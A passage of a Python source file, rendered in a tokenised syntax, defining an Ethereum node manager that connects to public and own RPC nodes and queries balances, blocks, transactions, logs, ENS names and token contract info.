NodeName.CLOUDFLARE_ETH NodeName.ETHERSCAN )<line_sep>ETHEREUM_NODES_TO_CONNECT_AT_START=(NodeName.OWN NodeName.MYCRYPTO NodeName.BLOCKSCOUT NodeName.ONEINCH NodeName.AVADO_POOL NodeName.ONEINCH NodeName.MYETHERWALLET # NodeName.LINKPOOL,
NodeName.CLOUDFLARE_ETH )<line_sep>OPEN_NODES_WEIGHT_MAP={# Probability with which to select each node
NodeName.ETHERSCAN:0.3 NodeName.MYCRYPTO:0.15 NodeName.BLOCKSCOUT:0.1 NodeName.AVADO_POOL:0.05 NodeName.ONEINCH:0.15 NodeName.MYETHERWALLET:0.15 # NodeName.LINKPOOL: 0.05,
NodeName.CLOUDFLARE_ETH:0.1 }<class_stmt>EthereumManager()<block_start><def_stmt>__init__ self ethrpc_endpoint:str etherscan:Etherscan msg_aggregator:MessagesAggregator greenlet_manager:GreenletManager connect_at_start:Sequence[NodeName] eth_rpc_timeout:int=DEFAULT_EVM_RPC_TIMEOUT <arrow><none><block_start>log.debug(f'Initializing Ethereum Manager with own rpc endpoint: {ethrpc_endpoint}')<line_sep>self.greenlet_manager=greenlet_manager<line_sep>self.web3_mapping:Dict[NodeName Web3]={}<line_sep>self.own_rpc_endpoint=ethrpc_endpoint<line_sep>self.etherscan=etherscan<line_sep>self.msg_aggregator=msg_aggregator<line_sep>self.eth_rpc_timeout=eth_rpc_timeout<line_sep>self.archive_connection=<false><line_sep>self.queried_archive_connection=<false><for_stmt>node connect_at_start<block_start>self.greenlet_manager.spawn_and_track(after_seconds=<none> task_name=f'Attempt connection to {str(node)} ethereum node' exception_is_error=<true> method=self.attempt_connect name=node ethrpc_endpoint=node.endpoint(self.own_rpc_endpoint) mainnet_check=<true> )<block_end>self.blocks_subgraph=Graph('https://api.thegraph.com/subgraphs/name/blocklytics/ethereum-blocks' )<line_sep># A cache for the erc20 contract info to not requery same one
self.contract_info_cache:Dict[ChecksumEthAddress Dict[str Any]]={}<block_end><def_stmt>connected_to_any_web3 self<arrow>bool<block_start><return>(NodeName.OWN<in>self.web3_mapping<or>NodeName.MYCRYPTO<in>self.web3_mapping<or>NodeName.BLOCKSCOUT<in>self.web3_mapping<or>NodeName.AVADO_POOL<in>self.web3_mapping)<block_end><def_stmt>default_call_order self skip_etherscan:bool=<false><arrow>List[NodeName]<block_start>"""Default call order for ethereum nodes
Own node always has preference. Then all other node types are randomly queried
in sequence depending on a weighted probability.
Some benchmarks on weighted probability based random selection when compared
to simple random selection. Benchmark was on blockchain balance querying with
29 ethereum accounts and at the time 1010 different ethereum tokens.
With weights: etherscan: 0.5, mycrypto: 0.25, blockscout: 0.2, avado: 0.05
===> Runs: 66, 58, 60, 68, 58 seconds
---> Average: 62 seconds
- Without weights
===> Runs: 66, 82, 72, 58, 72 seconds
---> Average: 70 seconds
"""<line_sep>result=[]<if_stmt>NodeName.OWN<in>self.web3_mapping<block_start>result.append(NodeName.OWN)<block_end>selection=list(OPEN_NODES)<if_stmt>skip_etherscan<block_start>selection.remove(NodeName.ETHERSCAN)<block_end>ordered_list=[]<while_stmt>len(selection)<ne>0<block_start>weights=[]<for_stmt>entry selection<block_start>weights.append(OPEN_NODES_WEIGHT_MAP[entry])<block_end>node=random.choices(selection weights k=1)<line_sep>ordered_list.append(node[0])<line_sep>selection.remove(node[0])<block_end><return>result+ordered_list<block_end><def_stmt>attempt_connect self name:NodeName ethrpc_endpoint:str mainnet_check:bool=<true> <arrow>Tuple[bool str]<block_start>"""Attempt to connect to a particular node type
For our own node if the given rpc endpoint is not the same as the saved one
the connection is re-attempted to the new one
"""<line_sep>message=''<line_sep>node_connected=self.web3_mapping.get(name <none>)<is><not><none><line_sep>own_node_already_connected=(name<eq>NodeName.OWN<and>self.own_rpc_endpoint<eq>ethrpc_endpoint<and>node_connected)<if_stmt>own_node_already_connected<or>(node_connected<and>name<ne>NodeName.OWN)<block_start><return><true> 'Already connected to an ethereum node'<block_end><try_stmt><block_start>parsed_eth_rpc_endpoint=urlparse(ethrpc_endpoint)<if_stmt><not>parsed_eth_rpc_endpoint.scheme<block_start>ethrpc_endpoint=f"http://{ethrpc_endpoint}"<block_end>provider=HTTPProvider(endpoint_uri=ethrpc_endpoint request_kwargs={'timeout':self.eth_rpc_timeout} )<line_sep>ens=ENS(provider)<line_sep>web3=Web3(provider ens=ens)<block_end><except_stmt>requests.exceptions.RequestException<block_start>message=f'Failed to connect to ethereum node {name} at endpoint {ethrpc_endpoint}'<line_sep>log.warning(message)<line_sep><return><false> message<block_end><try_stmt><block_start>is_connected=web3.isConnected()<block_end><except_stmt>AssertionError# Terrible, terrible hack but needed due to https://github.com/rotki/rotki/issues/1817
<block_start>is_connected=<false><block_end><if_stmt>is_connected# Also make sure we are actually connected to the Ethereum mainnet
<block_start>synchronized=<true><line_sep>msg=''<try_stmt><block_start><if_stmt>mainnet_check<block_start>network_id=int(web3.net.version)<if_stmt>network_id<ne>1<block_start>message=(f'Connected to ethereum node {name} at endpoint {ethrpc_endpoint} but '<concat>f'it is not on the ethereum mainnet. The chain id '<concat>f'the node is in is {network_id}.')<line_sep>log.warning(message)<line_sep><return><false> message<block_end><try_stmt><block_start>current_block=web3.eth.block_number# pylint: disable=no-member
latest_block=self.query_eth_highest_block()<block_end><except_stmt>(requests.exceptions.RequestException RemoteError)<as>e<block_start>msg=f'Could not query latest block due to {str(e)}'<line_sep>log.warning(msg)<line_sep>synchronized=<false><block_end><else_stmt><block_start>synchronized,msg=_is_synchronized(current_block latest_block)<block_end><block_end><block_end><except_stmt>ValueError<as>e<block_start>message=(f'Failed to connect to ethereum node {name} at endpoint '<concat>f'{ethrpc_endpoint} due to {str(e)}')<line_sep><return><false> message<block_end><if_stmt><not>synchronized<block_start>self.msg_aggregator.add_warning(f'We could not verify that ethereum node {name} is '<concat>'synchronized with the ethereum mainnet. Balances and other queries '<concat>'may be incorrect.' )<block_end>log.info(f'Connected ethereum node {name} at {ethrpc_endpoint}')<line_sep>self.web3_mapping[name]=web3<line_sep><return><true> ''<block_end># else
message=f'Failed to connect to ethereum node {name} at endpoint {ethrpc_endpoint}'<line_sep>log.warning(message)<line_sep><return><false> message<block_end><def_stmt>set_rpc_endpoint self endpoint:str<arrow>Tuple[bool str]<block_start>""" Attempts to set the RPC endpoint for the user's own ethereum node
Returns a tuple (result, message)
- result: Boolean for success or failure of changing the rpc endpoint
- message: A message containing information on what happened. Can
be populated both in case of success or failure"""<if_stmt>endpoint<eq>''<block_start>self.web3_mapping.pop(NodeName.OWN <none>)<line_sep>self.own_rpc_endpoint=''<line_sep><return><true> ''<block_end># else
result,message=self.attempt_connect(name=NodeName.OWN ethrpc_endpoint=endpoint)<if_stmt>result<block_start>log.info('Setting own node ETH RPC endpoint' endpoint=endpoint)<line_sep>self.own_rpc_endpoint=endpoint<block_end><return>result message<block_end><def_stmt>query self method:Callable call_order:Sequence[NodeName] **kwargs:Any<arrow>Any<block_start>"""Queries ethereum related data by performing the provided method to all given nodes
The first node in the call order that gets a succcesful response returns.
If none get a result then a remote error is raised
"""<for_stmt>node call_order<block_start>web3=self.web3_mapping.get(node <none>)<if_stmt>web3<is><none><and>node<ne>NodeName.ETHERSCAN<block_start><continue><block_end><try_stmt><block_start>result=method(web3 **kwargs)<block_end><except_stmt>(RemoteError requests.exceptions.RequestException BlockchainQueryError TransactionNotFound BlockNotFound BadResponseFormat ValueError # Yabir saw this happen with mew node for unavailable method at node. Since it's generic we should replace if web3 implements https://github.com/ethereum/web3.py/issues/2448 # noqa: E501
)<as>e<block_start>log.warning(f'Failed to query {node} for {str(method)} due to {str(e)}')<line_sep># Catch all possible errors here and just try next node call
<continue><block_end><return>result<block_end># no node in the call order list was succesfully queried
<raise>RemoteError(f'Failed to query {str(method)} after trying the following '<concat>f'nodes: {[str(x)<for>x call_order]}. Check logs for details.' )<block_end><def_stmt>_get_latest_block_number self web3:Optional[Web3]<arrow>int<block_start><if_stmt>web3<is><not><none><block_start><return>web3.eth.block_number<block_end># else
<return>self.etherscan.get_latest_block_number()<block_end><def_stmt>get_latest_block_number self call_order:Optional[Sequence[NodeName]]=<none><arrow>int<block_start><return>self.query(method=self._get_latest_block_number call_order=call_order<if>call_order<is><not><none><else>self.default_call_order() )<block_end><def_stmt>get_historical_eth_balance self address:ChecksumEthAddress block_number:int <arrow>Optional[FVal]<block_start>"""Attempts to get a historical eth balance from the local own node only.
If there is no node or the node can't query historical balance (not archive) then
returns None"""<line_sep>web3=self.web3_mapping.get(NodeName.OWN)<if_stmt>web3<is><none><block_start><return><none><block_end><try_stmt><block_start>result=web3.eth.get_balance(address block_identifier=block_number)<block_end><except_stmt>(requests.exceptions.RequestException BlockchainQueryError KeyError # saw this happen inside web3.py if resulting json contains unexpected key. Happened with mycrypto's node # noqa: E501
)<block_start><return><none><block_end><try_stmt><block_start>balance=from_wei(FVal(result))<block_end><except_stmt>ValueError<block_start><return><none><block_end><return>balance<block_end><def_stmt>have_archive self requery:bool=<false><arrow>bool<block_start>"""Checks to see if our own connected node is an archive node
If requery is True it always queries the node. Otherwise it remembers last query.
"""<if_stmt>self.queried_archive_connection<and>requery<is><false><block_start><return>self.archive_connection<block_end>balance=self.get_historical_eth_balance(address=string_to_ethereum_address('0x50532e4Be195D1dE0c2E6DfA46D9ec0a4Fee6861') block_number=87042 )<line_sep>self.archive_connection=balance<is><not><none><and>balance<eq>FVal('5.1063307')<line_sep>self.queried_archive_connection=<true><line_sep><return>self.archive_connection<block_end><def_stmt>query_eth_highest_block self<arrow>BlockNumber<block_start>""" Attempts to query an external service for the block height
Returns the highest blockNumber
May Raise RemoteError if querying fails
"""<line_sep>url='https://api.blockcypher.com/v1/eth/main'<line_sep>log.debug('Querying blockcypher for ETH highest block' url=url)<line_sep>eth_resp:Optional[Dict[str str]]<try_stmt><block_start>eth_resp=request_get_dict(url)<block_end><except_stmt>(RemoteError UnableToDecryptRemoteData requests.exceptions.RequestException)<block_start>eth_resp=<none><block_end>block_number:Optional[int]<if_stmt>eth_resp<and>'height'<in>eth_resp<block_start>block_number=int(eth_resp['height'])<line_sep>log.debug('ETH highest block result' block=block_number)<block_end><else_stmt><block_start>block_number=self.etherscan.get_latest_block_number()<line_sep>log.debug('ETH highest block result' block=block_number)<block_end><return>BlockNumber(block_number)<block_end><def_stmt>get_eth_balance self account:ChecksumEthAddress<arrow>FVal<block_start>"""Gets the balance of the given account in ETH
May raise:
- RemoteError if Etherscan is used and there is a problem querying it or
parsing its response
"""<line_sep>result=self.get_multieth_balance([account])<line_sep><return>result[account]<block_end><def_stmt>get_multieth_balance self accounts:List[ChecksumEthAddress] call_order:Optional[Sequence[NodeName]]=<none> <arrow>Dict[ChecksumEthAddress FVal]<block_start>"""Returns a dict with keys being accounts and balances in ETH
May raise:
- RemoteError if an external service such as Etherscan is queried and
there is a problem with its query.
"""<line_sep>balances:Dict[ChecksumEthAddress FVal]={}<line_sep>log.debug('Querying ethereum chain for ETH balance' eth_addresses=accounts )<line_sep>result=ETH_SCAN.call(ethereum=self method_name='etherBalances' arguments=[accounts] call_order=call_order<if>call_order<is><not><none><else>self.default_call_order() )<line_sep>balances={}<for_stmt>idx,account enumerate(accounts)<block_start>balances[account]=from_wei(result[idx])<block_end><return>balances<block_end><def_stmt>get_block_by_number self num:int call_order:Optional[Sequence[NodeName]]=<none> <arrow>Dict[str Any]<block_start><return>self.query(method=self._get_block_by_number call_order=call_order<if>call_order<is><not><none><else>self.default_call_order() num=num )<block_end><def_stmt>_get_block_by_number self web3:Optional[Web3] num:int<arrow>Dict[str Any]<block_start>"""Returns the block object corresponding to the given block number
May raise:
- RemoteError if an external service such as Etherscan is queried and
there is a problem with its query.
- BlockNotFound if number used to lookup the block can't be found. Raised
by web3.eth.get_block().
"""<if_stmt>web3<is><none><block_start><return>self.etherscan.get_block_by_number(num)<block_end>block_data:MutableAttributeDict=MutableAttributeDict(web3.eth.get_block(num))# type: ignore # pylint: disable=no-member # noqa: E501
block_data['hash']=hex_or_bytes_to_str(block_data['hash'])<line_sep><return>dict(block_data)<block_end><def_stmt>get_code self account:ChecksumEthAddress call_order:Optional[Sequence[NodeName]]=<none> <arrow>str<block_start><return>self.query(method=self._get_code call_order=call_order<if>call_order<is><not><none><else>self.default_call_order() account=account )<block_end><def_stmt>_get_code self web3:Optional[Web3] account:ChecksumEthAddress<arrow>str<block_start>"""Gets the deployment bytecode at the given address
May raise:
- RemoteError if Etherscan is used and there is a problem querying it or
parsing its response
"""<if_stmt>web3<is><none><block_start><return>self.etherscan.get_code(account)<block_end><return>hex_or_bytes_to_str(web3.eth.getCode(account))<block_end><def_stmt>ens_reverse_lookup self reversed_addresses:List[ChecksumEthAddress]<arrow>Dict[ChecksumEthAddress Optional[str]]# noqa: E501
<block_start>"""Performs a reverse ENS lookup on a list of addresses
Because a multicall is used, no exceptions are raised.
If any exceptions occur, they are logged and None is returned for that
"""<line_sep>human_names:Dict[ChecksumEthAddress Optional[str]]={}<line_sep># Querying resolvers' addresses
resolver_params=[EnsContractParams(address=addr abi=ENS_ABI method_name='resolver' arguments=_prepare_ens_call_arguments(addr))# noqa: E501
<for>addr reversed_addresses]<line_sep>resolvers_output=multicall(ethereum=self calls=[(ENS_MAINNET_ADDR _encode_ens_contract(params=params))<for>params resolver_params] # noqa: E501
)<line_sep>resolvers=[]<line_sep># We need a new list for reversed_addresses because not all addresses have resolver
filtered_reversed_addresses=[]<line_sep># Processing resolvers query output
<for_stmt>reversed_addr,params,resolver_output zip(reversed_addresses resolver_params resolvers_output)# noqa: E501
<block_start>decoded_resolver=_decode_ens_contract(params=params result_encoded=resolver_output)<if_stmt>is_none_or_zero_address(decoded_resolver)<block_start>human_names[reversed_addr]=<none><line_sep><continue><block_end><try_stmt><block_start>deserialized_resolver=deserialize_ethereum_address(decoded_resolver)<block_end><except_stmt>DeserializationError<block_start>log.error(f'Error deserializing address {decoded_resolver} while doing reverse ens lookup' # noqa: E501
)<line_sep>human_names[reversed_addr]=<none><line_sep><continue><block_end>resolvers.append(deserialized_resolver)<line_sep>filtered_reversed_addresses.append(reversed_addr)<block_end># Querying human names
human_names_params=[EnsContractParams(address=resolver abi=ENS_RESOLVER_ABI method_name='name' arguments=_prepare_ens_call_arguments(addr))# noqa: E501
<for>addr,resolver zip(filtered_reversed_addresses resolvers)]<line_sep>human_names_output=multicall(ethereum=self calls=[(params.address _encode_ens_contract(params=params))<for>params human_names_params] # noqa: E501
)<line_sep># Processing human names query output
<for_stmt>addr,params,human_name_output zip(filtered_reversed_addresses human_names_params human_names_output)# noqa: E501
<block_start>human_names[addr]=_decode_ens_contract(params=params result_encoded=human_name_output)<block_end># noqa: E501
<return>human_names<block_end>@overload<def_stmt>ens_lookup self name:str blockchain:Literal[SupportedBlockchain.ETHEREUM]=SupportedBlockchain.ETHEREUM call_order:Optional[Sequence[NodeName]]=<none> <arrow>Optional[ChecksumEthAddress]<block_start><ellipsis><block_end>@overload<def_stmt>ens_lookup self name:str blockchain:Literal[SupportedBlockchain.BITCOIN SupportedBlockchain.KUSAMA SupportedBlockchain.POLKADOT ] call_order:Optional[Sequence[NodeName]]=<none> <arrow>Optional[HexStr]<block_start><ellipsis><block_end><def_stmt>ens_lookup self name:str blockchain:SupportedBlockchain=SupportedBlockchain.ETHEREUM call_order:Optional[Sequence[NodeName]]=<none> <arrow>Optional[Union[ChecksumEthAddress HexStr]]<block_start><return>self.query(method=self._ens_lookup call_order=call_order<if>call_order<is><not><none><else>self.default_call_order() name=name blockchain=blockchain )<block_end>@overload<def_stmt>_ens_lookup self web3:Optional[Web3] name:str blockchain:Literal[SupportedBlockchain.ETHEREUM] <arrow>Optional[ChecksumEthAddress]<block_start><ellipsis><block_end>@overload<def_stmt>_ens_lookup self web3:Optional[Web3] name:str blockchain:Literal[SupportedBlockchain.BITCOIN SupportedBlockchain.KUSAMA SupportedBlockchain.POLKADOT ] <arrow>Optional[HexStr]<block_start><ellipsis><block_end><def_stmt>_ens_lookup self web3:Optional[Web3] name:str blockchain:SupportedBlockchain=SupportedBlockchain.ETHEREUM <arrow>Optional[Union[ChecksumEthAddress HexStr]]<block_start>"""Performs an ENS lookup and returns address if found else None
TODO: currently web3.py 5.15.0 does not support multichain ENS domains
(EIP-2304), therefore requesting a non-Ethereum address won't use the
web3 ens library and will require to extend the library resolver ABI.
An issue in their repo (#1839) reporting the lack of support has been
created. This function will require refactoring once they include
support for EIP-2304.
https://github.com/ethereum/web3.py/issues/1839
May raise:
- RemoteError if Etherscan is used and there is a problem querying it or
parsing its response
- InputError if the given name is not a valid ENS name
"""<try_stmt><block_start>normal_name=normalize_name(name)<block_end><except_stmt>InvalidName<as>e<block_start><raise>InputError(str(e))<from>e<block_end>resolver_addr=self._call_contract(web3=web3 contract_address=ENS_MAINNET_ADDR abi=ENS_ABI method_name='resolver' arguments=[normal_name_to_hash(normal_name)] )<if_stmt>is_none_or_zero_address(resolver_addr)<block_start><return><none><block_end>ens_resolver_abi=ENS_RESOLVER_ABI.copy()<line_sep>arguments=[normal_name_to_hash(normal_name)]<if_stmt>blockchain<ne>SupportedBlockchain.ETHEREUM<block_start>ens_resolver_abi.extend(ENS_RESOLVER_ABI_MULTICHAIN_ADDRESS)<line_sep>arguments.append(blockchain.ens_coin_type())<block_end><try_stmt><block_start>deserialized_resolver_addr=deserialize_ethereum_address(resolver_addr)<block_end><except_stmt>DeserializationError<block_start>log.error(f'Error deserializing address {resolver_addr} while doing'<concat>f'ens lookup' )<line_sep><return><none><block_end>address=self._call_contract(web3=web3 contract_address=deserialized_resolver_addr abi=ens_resolver_abi method_name='addr' arguments=arguments )<if_stmt>is_none_or_zero_address(address)<block_start><return><none><block_end><if_stmt>blockchain<ne>SupportedBlockchain.ETHEREUM<block_start><return>HexStr(address.hex())<block_end><try_stmt><block_start><return>deserialize_ethereum_address(address)<block_end><except_stmt>DeserializationError<block_start>log.error(f'Error deserializing address {address}')<line_sep><return><none><block_end><block_end><def_stmt>_call_contract_etherscan self contract_address:ChecksumEthAddress abi:List method_name:str arguments:Optional[List[Any]]=<none> <arrow>Any<block_start>"""Performs an eth_call to an ethereum contract via etherscan
May raise:
- RemoteError if there is a problem with
reaching etherscan or with the returned result
"""<line_sep>web3=Web3()<line_sep>contract=web3.eth.contract(address=contract_address abi=abi)<line_sep>input_data=contract.encodeABI(method_name args=arguments<if>arguments<else>[])<line_sep>result=self.etherscan.eth_call(to_address=contract_address input_data=input_data )<if_stmt>result<eq>'0x'<block_start><raise>BlockchainQueryError(f'Error doing call on contract {contract_address} for {method_name} '<concat>f'with arguments: {str(arguments)} via etherscan. Returned 0x result' )<block_end>fn_abi=contract._find_matching_fn_abi(fn_identifier=method_name args=arguments )<line_sep>output_types=get_abi_output_types(fn_abi)<line_sep>output_data=web3.codec.decode_abi(output_types bytes.fromhex(result[2:]))<if_stmt>len(output_data)<eq>1# due to https://github.com/PyCQA/pylint/issues/4114
<block_start><return>output_data[0]# pylint: disable=unsubscriptable-object
<block_end><return>output_data<block_end><def_stmt>_get_transaction_receipt self web3:Optional[Web3] tx_hash:EVMTxHash <arrow>Dict[str Any]<block_start><if_stmt>web3<is><none><block_start>tx_receipt=self.etherscan.get_transaction_receipt(tx_hash)<try_stmt># Turn hex numbers to int
<block_start>block_number=int(tx_receipt['blockNumber'] 16)<line_sep>tx_receipt['blockNumber']=block_number<line_sep>tx_receipt['cumulativeGasUsed']=int(tx_receipt['cumulativeGasUsed'] 16)<line_sep>tx_receipt['gasUsed']=int(tx_receipt['gasUsed'] 16)<line_sep>tx_receipt['status']=int(tx_receipt.get('status' '0x1') 16)<line_sep>tx_index=int(tx_receipt['transactionIndex'] 16)<line_sep>tx_receipt['transactionIndex']=tx_index<for_stmt>receipt_log tx_receipt['logs']<block_start>receipt_log['blockNumber']=block_number<line_sep>receipt_log['logIndex']=deserialize_int_from_hex(symbol=receipt_log['logIndex'] location='etherscan tx receipt' )<line_sep>receipt_log['transactionIndex']=tx_index<block_end><block_end><except_stmt>(DeserializationError ValueError KeyError)<as>e<block_start>msg=str(e)<if_stmt>isinstance(e KeyError)<block_start>msg=f'missing key {msg}'<block_end>log.error(f'Couldnt deserialize transaction receipt {tx_receipt} data from '<concat>f'etherscan due to {msg}' )<line_sep><raise>RemoteError(f'Couldnt deserialize transaction receipt data from etherscan '<concat>f'due to {msg}. Check logs for details' )<from>e<block_end><return>tx_receipt<block_end># Can raise TransactionNotFound if the user's node is pruned and transaction is old
tx_receipt=web3.eth.get_transaction_receipt(tx_hash)# type: ignore
<return>process_result(tx_receipt)<block_end><def_stmt>get_transaction_receipt self tx_hash:EVMTxHash call_order:Optional[Sequence[NodeName]]=<none> <arrow>Dict[str Any]<block_start><return>self.query(method=self._get_transaction_receipt call_order=call_order<if>call_order<is><not><none><else>self.default_call_order() tx_hash=tx_hash )<block_end><def_stmt>_get_transaction_by_hash self web3:Optional[Web3] tx_hash:EVMTxHash <arrow>EthereumTransaction<block_start><if_stmt>web3<is><none><block_start>tx_data=self.etherscan.get_transaction_by_hash(tx_hash=tx_hash)<block_end><else_stmt><block_start>tx_data=web3.eth.get_transaction(tx_hash)<block_end># type: ignore
<try_stmt><block_start>transaction=deserialize_ethereum_transaction(data=tx_data internal=<false> ethereum=self)# noqa: E501
<block_end><except_stmt>(DeserializationError ValueError)<as>e<block_start><raise>RemoteError(f'Couldnt deserialize ethereum transaction data from {tx_data}. Error: {str(e)}' )<from>e<block_end><return>transaction<block_end><def_stmt>get_transaction_by_hash self tx_hash:EVMTxHash call_order:Optional[Sequence[NodeName]]=<none> <arrow>EthereumTransaction<block_start><return>self.query(method=self._get_transaction_by_hash call_order=call_order<if>call_order<is><not><none><else>self.default_call_order() tx_hash=tx_hash )<block_end><def_stmt>call_contract self contract_address:ChecksumEthAddress abi:List method_name:str arguments:Optional[List[Any]]=<none> call_order:Optional[Sequence[NodeName]]=<none> block_identifier:BlockIdentifier='latest' <arrow>Any<block_start><return>self.query(method=self._call_contract call_order=call_order<if>call_order<is><not><none><else>self.default_call_order() contract_address=contract_address abi=abi method_name=method_name arguments=arguments block_identifier=block_identifier )<block_end><def_stmt>_call_contract self web3:Optional[Web3] contract_address:ChecksumEthAddress abi:List method_name:str arguments:Optional[List[Any]]=<none> block_identifier:BlockIdentifier='latest' <arrow>Any<block_start>"""Performs an eth_call to an ethereum contract
May raise:
- RemoteError if etherscan is used and there is a problem with
reaching it or with the returned result
- BlockchainQueryError if web3 is used and there is a VM execution error
"""<if_stmt>web3<is><none><block_start><return>self._call_contract_etherscan(contract_address=contract_address abi=abi method_name=method_name arguments=arguments )<block_end>contract=web3.eth.contract(address=contract_address abi=abi)<try_stmt><block_start>method=getattr(contract.caller(block_identifier=block_identifier) method_name)<line_sep>result=method(*arguments<if>arguments<else>[])<block_end><except_stmt>(ValueError BadFunctionCallOutput)<as>e<block_start><raise>BlockchainQueryError(f'Error doing call on contract {contract_address}: {str(e)}' )<from>e<block_end><return>result<block_end><def_stmt>get_logs self contract_address:ChecksumEthAddress abi:List event_name:str argument_filters:Dict[str Any] from_block:int to_block:Union[int Literal['latest']]='latest' call_order:Optional[Sequence[NodeName]]=<none> <arrow>List[Dict[str Any]]<block_start><if_stmt>call_order<is><none># Default call order for logs
<block_start>call_order=(NodeName.OWN NodeName.ETHERSCAN)<block_end><return>self.query(method=self._get_logs call_order=call_order contract_address=contract_address abi=abi event_name=event_name argument_filters=argument_filters from_block=from_block to_block=to_block )<block_end><def_stmt>_get_logs self web3:Optional[Web3] contract_address:ChecksumEthAddress abi:List event_name:str argument_filters:Dict[str Any] from_block:int to_block:Union[int Literal['latest']]='latest' <arrow>List[Dict[str Any]]<block_start>"""Queries logs of an ethereum contract
May raise:
- RemoteError if etherscan is used and there is a problem with
reaching it or with the returned result
"""<line_sep>event_abi=find_matching_event_abi(abi=abi event_name=event_name)<line_sep>_,filter_args=construct_event_filter_params(event_abi=event_abi abi_codec=Web3().codec contract_address=contract_address argument_filters=argument_filters fromBlock=from_block toBlock=to_block )<if_stmt>event_abi['anonymous']# web3.py does not handle the anonymous events correctly and adds the first topic
<block_start>filter_args['topics']=filter_args['topics'][1:]<block_end>events:List[Dict[str Any]]=[]<line_sep>start_block=from_block<if_stmt>web3<is><not><none><block_start>events=_query_web3_get_logs(web3=web3 filter_args=filter_args from_block=from_block to_block=to_block contract_address=contract_address event_name=event_name argument_filters=argument_filters )<block_end><else_stmt># etherscan
<block_start>until_block=(self.etherscan.get_latest_block_number()<if>to_block<eq>'latest'<else>to_block)<line_sep>blocks_step=300000<while_stmt>start_block<le>until_block<block_start><while_stmt><true># loop to continuously reduce block range if need b
<block_start>end_block=min(start_block+blocks_step until_block)<try_stmt><block_start>new_events=self.etherscan.get_logs(contract_address=contract_address topics=filter_args['topics'] # type: ignore
from_block=start_block to_block=end_block )<block_end><except_stmt>RemoteError<as>e<block_start><if_stmt>'Please select a smaller result dataset'<in>str(e)<block_start>blocks_step=blocks_step<floordiv>2<if_stmt>blocks_step<l>100<block_start><raise># stop trying
<block_end># else try with the smaller step
<continue><block_end># else some other error
<raise><block_end><break><block_end># we must have a result
# Turn all Hex ints to ints
<for_stmt>e_idx,event enumerate(new_events)<block_start><try_stmt><block_start>block_number=deserialize_int_from_hex(symbol=event['blockNumber'] location='etherscan log query' )<line_sep>log_index=deserialize_int_from_hex(symbol=event['logIndex'] location='etherscan log query' )<line_sep># Try to see if the event is a duplicate that got returned
# in the previous iteration
<for_stmt>previous_event reversed(events)<block_start><if_stmt>previous_event['blockNumber']<l>block_number<block_start><break><block_end>same_event=(previous_event['logIndex']<eq>log_index<and>previous_event['transactionHash']<eq>event['transactionHash'])<if_stmt>same_event<block_start>events.pop()<block_end><block_end>new_events[e_idx]['address']=deserialize_ethereum_address(event['address'] )<line_sep>new_events[e_idx]['blockNumber']=block_number<line_sep>new_events[e_idx]['timeStamp']=deserialize_int_from_hex(symbol=event['timeStamp'] location='etherscan log query' )<line_sep>new_events[e_idx]['gasPrice']=deserialize_int_from_hex(symbol=event['gasPrice'] location='etherscan log query' )<line_sep>new_events[e_idx]['gasUsed']=deserialize_int_from_hex(symbol=event['gasUsed'] location='etherscan log query' )<line_sep>new_events[e_idx]['logIndex']=log_index<line_sep>new_events[e_idx]['transactionIndex']=deserialize_int_from_hex(symbol=event['transactionIndex'] location='etherscan log query' )<block_end><except_stmt>DeserializationError<as>e<block_start><raise>RemoteError('Couldnt decode an etherscan event due to {str(e)}}' )<from>e<block_end><block_end># etherscan will only return 1000 events in one go. If more than 1000
# are returned such as when no filter args are provided then continue
# the query from the last block
<if_stmt>len(new_events)<eq>1000<block_start>start_block=new_events[-1]['blockNumber']<block_end><else_stmt><block_start>start_block=end_block+1<block_end>events.extend(new_events)<block_end><block_end><return>events<block_end><def_stmt>get_event_timestamp self event:Dict[str Any]<arrow>Timestamp<block_start>"""Reads an event returned either by etherscan or web3 and gets its timestamp
Etherscan events contain a timestamp. Normal web3 events don't so it needs to
be queried from the block number
WE could also add this to the get_logs() call but would add unnecessary
rpc calls for get_block_by_number() for each log entry. Better have it
lazy queried like this.
TODO: Perhaps better approach would be a log event class for this
"""<if_stmt>'timeStamp'<in>event# event from etherscan
<block_start><return>Timestamp(event['timeStamp'])<block_end># event from web3
block_number=event['blockNumber']<line_sep>block_data=self.get_block_by_number(block_number)<line_sep><return>Timestamp(block_data['timestamp'])<block_end><def_stmt>_get_blocknumber_by_time_from_subgraph self ts:Timestamp<arrow>int<block_start>"""Queries Ethereum Blocks Subgraph for closest block at or before given timestamp"""<line_sep>response=self.blocks_subgraph.query(f"""
{{
blocks(
first: 1, orderBy: timestamp, orderDirection: desc,
where: {{timestamp_lte: "{ts}"}}
) {{
id
number
timestamp
}}
}}
""" )<try_stmt><block_start>result=int(response['blocks'][0]['number'])<block_end><except_stmt>(IndexError KeyError)<as>e<block_start><raise>RemoteError(f'Got unexpected ethereum blocks subgraph response: {response}' )<from>e<block_end><else_stmt><block_start><return>result<block_end><block_end><def_stmt>get_blocknumber_by_time self ts:Timestamp etherscan:bool=<true><arrow>int<block_start>"""Searches for the blocknumber of a specific timestamp
- Performs the etherscan api call by default first
- If RemoteError raised or etherscan flag set to false
-> queries blocks subgraph
"""<if_stmt>etherscan<block_start><try_stmt><block_start><return>self.etherscan.get_blocknumber_by_time(ts)<block_end><except_stmt>RemoteError<block_start><pass><block_end><block_end><return>self._get_blocknumber_by_time_from_subgraph(ts)<block_end><def_stmt>get_basic_contract_info self address:ChecksumEthAddress<arrow>Dict[str Any]<block_start>"""
Query a contract address and return basic information as:
- Decimals
- name
- symbol
if it is provided in the contract. This method may raise:
- BadFunctionCallOutput: If there is an error calling a bad address
"""<line_sep>cache=self.contract_info_cache.get(address)<if_stmt>cache<is><not><none><block_start><return>cache<block_end>properties=('decimals' 'symbol' 'name')<line_sep>info:Dict[str Any]={}<line_sep>contract=EthereumContract(address=address abi=ERC20TOKEN_ABI deployed_block=0)<try_stmt># Output contains call status and result
<block_start>output=multicall_2(ethereum=self require_success=<false> calls=[(address contract.encode(method_name=prop))<for>prop properties] )<block_end><except_stmt>RemoteError# If something happens in the connection the output should have
# the same length as the tuple of properties
<block_start>output=[(<false> b'')]<times>len(properties)<block_end><try_stmt><block_start>decoded=[contract.decode(x[1] method_name)[0]# pylint: disable=E1136
<if>x[0]<and>len(x[1])<else><none><for>(x method_name) zip(output properties)]<block_end><except_stmt>OverflowError<as>e# This can happen when contract follows the ERC20 standard methods
# but name and symbol return bytes instead of string. UNIV1 LP is in this case
